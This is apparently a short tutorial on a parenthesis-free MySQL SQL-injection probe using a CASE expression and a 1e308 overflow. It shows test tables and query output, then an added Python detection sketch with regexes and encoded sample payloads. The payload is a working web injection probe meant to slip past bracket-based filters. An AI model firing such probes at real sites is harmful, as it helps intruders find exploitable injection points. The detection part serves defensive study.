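0x00 Overview

This technique can only be used to prove that an injection point exists.

It applies when parentheses ( ) cannot appear in the payload, which makes many functions and methods unusable.

0x00 How to remember it

    case when '12345'like'1%' then'1'else 2*1e308 end

0x01 Test data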

    mysql> select user();
    +----------------+
    | user()         |
    +----------------+
    | root@localhost |
    +----------------+
    1 row in set (0.00 sec)

    mysql> select * from users;
    +----+----------+------------+
    | id | username | password   |
    +----+----------+------------+
    |  1 | Dumb     | Dumb       |
    |  2 | Angelina | I-kill-you |
    |  4 | secure   | crappy     |
    |  5 | stupid   | stupidity  |
    |  7 | batman   | mob!le     |
    |  8 | admin    | admin      |
    +----+----------+------------+
    6 rows in set (0.00 sec)

0x01 Test

    -- True case
    -- The original data is returned and the page stays unchanged
    mysql> select * from users where id = 1 and case when '12345'like'1%' then'1'else 2*1e308 end;
    +----+----------+----------+
    | id | username | password |
    +----+----------+----------+
    |  1 | Dumb     | Dumb     |
    +----+----------+----------+
    1 row in set (0.00 sec)

    -- False case
    -- The page throws an error; if error display is turned off, the page's data will be empty
    mysql> select * from users where id = 1 and case when '12345'like'66%' then'1'else 2*1e308 end;
    ERROR 1690 (22003): DOUBLE value is out of range in '(2 * 1e308)'
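
Because the probe above contains no parentheses, a filter or log rule keyed on ( and ) never sees it. The following detection sketch is an added example, not part of the original post: it flags the CASE expression and the near-limit exponent literal in request values. The function names, thresholds and sample values are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# CASE ... WHEN ... THEN ... ELSE ... END; \b works even when quotes
# replace the spaces between keywords, as in '12345'like'1%' then'1'else.
CASE_EXPR = re.compile(
    r"\bcase\b.*?\bwhen\b.*?\bthen\b.*?\belse\b.*?\bend\b", re.S)
# Float literal in exponent form, e.g. 1e308; group 1 is the exponent.
EXP_LITERAL = re.compile(r"\b\d+(?:\.\d+)?e\+?(\d+)\b")


def has_parens(raw: str) -> bool:
    """The naive check: treat a value as suspicious only if it has ( or )."""
    decoded = unquote_plus(raw)
    return "(" in decoded or ")" in decoded


def classify(raw: str) -> list:
    """Return the indicators found in one raw query-string value."""
    text = unquote_plus(raw).lower()
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)  # inline comments
    hits = []
    if CASE_EXPR.search(text):
        hits.append("case-expression")
    # Exponents near the DOUBLE limit (about 1.8e308) have no place in
    # ordinary request parameters; arithmetic on them raises ERROR 1690.
    if any(int(m.group(1)) >= 300 for m in EXP_LITERAL.finditer(text)):
        hits.append("overflow-literal")
    return hits


# Constructed sample values (not real traffic).
SAMPLES = [
    "id=1",
    "id=1+and+case+when+'12345'like'1%25'+then'1'else+2*1e308+end",
    "id=1%20and%20case/**/when%20'12345'like'66%25'%20then'1'else%202*1e308%20end",
    "q=in+case+of+fire+when+ready",
    "name=O'Brien+(home)",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"parens={has_parens(s)!s:5} hits={classify(s)} {s}")
```

Detection only tells you the probe was attempted; the fix for the injectable `id` parameter is to bind it as a typed query parameter instead of concatenating it into the statement.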